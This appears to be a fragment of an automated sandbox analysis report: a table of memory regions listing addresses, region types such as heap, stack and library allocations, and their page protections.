page read and write
|
||
55E000
|
heap
|
page read and write
|
||
29F9000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
1680D018000
|
trusted library allocation
|
page read and write
|
||
1E0000
|
unkown
|
page readonly
|
||
4281000
|
heap
|
page read and write
|
||
794A000
|
heap
|
page read and write
|
||
1F0000
|
heap
|
page read and write
|
||
2DB9000
|
heap
|
page read and write
|
||
45CE000
|
stack
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
71D1000
|
heap
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
||
528000
|
heap
|
page read and write
|
||
14C1000
|
unkown
|
page readonly
|
||
2D98000
|
heap
|
page read and write
|
||
23C10F17000
|
trusted library allocation
|
page read and write
|
||
1680A5B0000
|
heap
|
page read and write
|
||
2A9A000
|
heap
|
page read and write
|
||
23C10F21000
|
trusted library allocation
|
page read and write
|
||
1680C030000
|
trusted library allocation
|
page read and write
|
||
48B4000
|
heap
|
page read and write
|
||
2DB3000
|
heap
|
page read and write
|
||
3F0000
|
heap
|
page read and write
|
||
78B9000
|
heap
|
page read and write
|
||
7FF849020000
|
trusted library allocation
|
page read and write
|
||
23FDB000
|
unclassified section
|
page execute and read and write
|
||
2DBB000
|
heap
|
page read and write
|
||
23C110B0000
|
trusted library allocation
|
page read and write
|
||
4281000
|
heap
|
page read and write
|
There are 957 hidden memdumps, click here to show them.